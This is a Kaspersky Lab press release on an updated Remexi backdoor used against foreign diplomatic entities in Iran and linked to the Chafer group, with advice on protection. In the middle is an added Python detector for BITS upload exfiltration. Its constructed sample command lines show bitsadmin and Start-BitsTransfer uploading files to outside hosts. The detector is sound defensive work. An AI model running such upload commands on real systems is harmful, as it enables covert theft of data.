Kaspersky Lab researchers have detected multiple attempts to infect foreign diplomatic entities in Iran with homebrew spyware. The attacks appear to be using an updated Remexi backdoor. Several legitimate tools were also used during the campaign. The Remexi backdoor is linked to a suspected Farsi-speaking cyberespionage group known as Chafer, previously associated with the cyber-surveillance of individuals in the Middle East. The targeting of embassies could suggest a new focus for the group.

 

The operation highlights how threat actors in emerging regions are mounting campaigns against targets of interest using relatively basic, homebrew malware combined with publicly available tools. In this instance, the attackers used an improved version of the Remexi backdoor – a tool that enables remote administration of a victim’s machine.

 

Remexi was first detected in 2015, being used by a cyberespionage group named Chafer for a cyber-surveillance operation targeting individuals and a number of organizations across the Middle East. The fact that the backdoor used in the new campaign has code similarities with known Remexi samples, combined with the target victim set, means that Kaspersky Lab’s researchers have linked it to Chafer with medium confidence.

 

The newly discovered Remexi malware is able to execute commands remotely and to seize screenshots, browser data including user credentials, login data and history, and any typed text, among other things. The stolen data is exfiltrated using the legitimate Microsoft Background Intelligent Transfer Service (BITS) application – a Windows component designed to enable background Windows updates. The trend towards combining malware with appropriated or legitimate code helps attackers both to save time and resources when creating malware and to make attribution more complicated.
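
A defender-side check for the BITS exfiltration channel described above, added here as an example and not taken from Kaspersky Lab's report: it scans process-creation command lines for BITS upload jobs whose destination is outside an allowlist. The log records, host names and allowlist are constructed, and that such jobs are started through `bitsadmin` or `Start-BitsTransfer` is an assumption.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts allowed to receive BITS uploads in this environment (constructed).
ALLOWED_UPLOAD_HOSTS = {"wsus.corp.example"}

# BITS upload jobs started with bitsadmin or with the PowerShell cmdlet.
BITSADMIN_UPLOAD = re.compile(r"\bbitsadmin(\.exe)?\b.*?\s/upload\b", re.I)
PS_UPLOAD = re.compile(r"\bStart-BitsTransfer\b.*-TransferType\s+Upload", re.I)
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)

# Constructed process-creation records: (computer name, command line).
SAMPLE_EVENTS = [
    ("WS-014", r"bitsadmin.exe /transfer job1 /upload /priority HIGH "
               r"http://203.0.113.10/up/a.dat C:\Users\Public\a.dat"),
    ("WS-014", r"bitsadmin /transfer upd /download "
               r"https://download.example/p.cab C:\Temp\p.cab"),
    ("SRV-02", r'powershell -c "Start-BitsTransfer -TransferType Upload '
               r'-Source C:\logs\a.zip -Destination https://wsus.corp.example/in/a.zip"'),
    ("WS-031", r"powershell Start-BitsTransfer -Source C:\x.bin "
               r"-Destination https://files.example.net/x.bin -TransferType Upload"),
]


def find_bits_uploads(events, allowed_hosts=ALLOWED_UPLOAD_HOSTS):
    """Return (computer, destinations) for BITS uploads to non-allowlisted hosts."""
    findings = []
    for computer, cmdline in events:
        if not (BITSADMIN_UPLOAD.search(cmdline) or PS_UPLOAD.search(cmdline)):
            continue  # not an upload job (downloads are normal update traffic)
        hosts = {urlparse(u).hostname for u in URL_RE.findall(cmdline)}
        hosts.discard(None)
        if not hosts:
            # Upload job with no URL on this command line: destination was set
            # in a separate step, so report it for manual review.
            findings.append((computer, ["<unknown>"]))
            continue
        unexpected = sorted(h for h in hosts if h.lower() not in allowed_hosts)
        if unexpected:
            findings.append((computer, unexpected))
    return findings


if __name__ == "__main__":
    for computer, dests in find_bits_uploads(SAMPLE_EVENTS):
        print(f"{computer}: BITS upload to {', '.join(dests)}")
```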

 

“When we talk about likely state-sponsored cyberespionage campaigns, people often imagine advanced operations with complex tools developed by experts. However, the people behind this spyware campaign look more like system administrators than sophisticated threat actors: they know how to code, but their campaign relies more on the creative use of tools that exist already, than on new, advanced features or elaborate architecture of the code.”

 

“However, even relatively simple tools can cause significant damage, so we urge organizations to protect their valuable information and systems against all levels of threats, and to use threat intelligence to understand how the landscape is evolving,” – said Denis Legezo, Security Researcher at Kaspersky Lab.

 

Kaspersky Lab products detect the updated Remexi malware as Trojan.Win32.Remexi and Trojan.Win32.Agent.

 

For more information on Kaspersky Lab’s threat intelligence services please contact: intelreports@kaspersky.com

 

To protect yourself from targeted spyware:

 

  • Use a proven, corporate-grade security solution with anti-targeted attack capabilities and threat intelligence, such as Kaspersky Threat Management and Defense solution. It is capable of spotting and catching advanced targeted attacks by analyzing network anomalies and giving cybersecurity teams full visibility over the network and response automation.

 

 

  • Provide your security team with access to up-to-date threat intelligence data, to keep pace with the latest tactics and tools used by cybercriminals, and enhance security controls already in use.

 

 

Read the full version of the report on Securelist.com.

 

